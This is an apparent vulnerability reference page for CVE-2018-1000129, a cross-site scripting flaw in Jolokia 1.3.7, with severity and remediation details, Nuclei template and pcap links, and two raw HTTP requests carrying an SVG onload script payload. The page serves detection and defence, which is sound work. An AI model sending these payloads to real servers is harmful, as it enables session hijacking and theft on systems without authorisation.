| Title | Jolokia 1.3.7 - Cross-Site Scripting |
|---|---|
| Author | mavericknerd,0h1in9e,daffainfo |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Upgrade to a patched version of Jolokia or apply the necessary security patches to mitigate the XSS vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.67423 |
| CVE ID | CVE-2018-1000129 |
| CWE ID | CWE-79 |
| Tags | cve2018 cve jolokia xss vuln |
Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim’s browser.
GET /api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-1000129.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-1000129.pcap
N/AN/A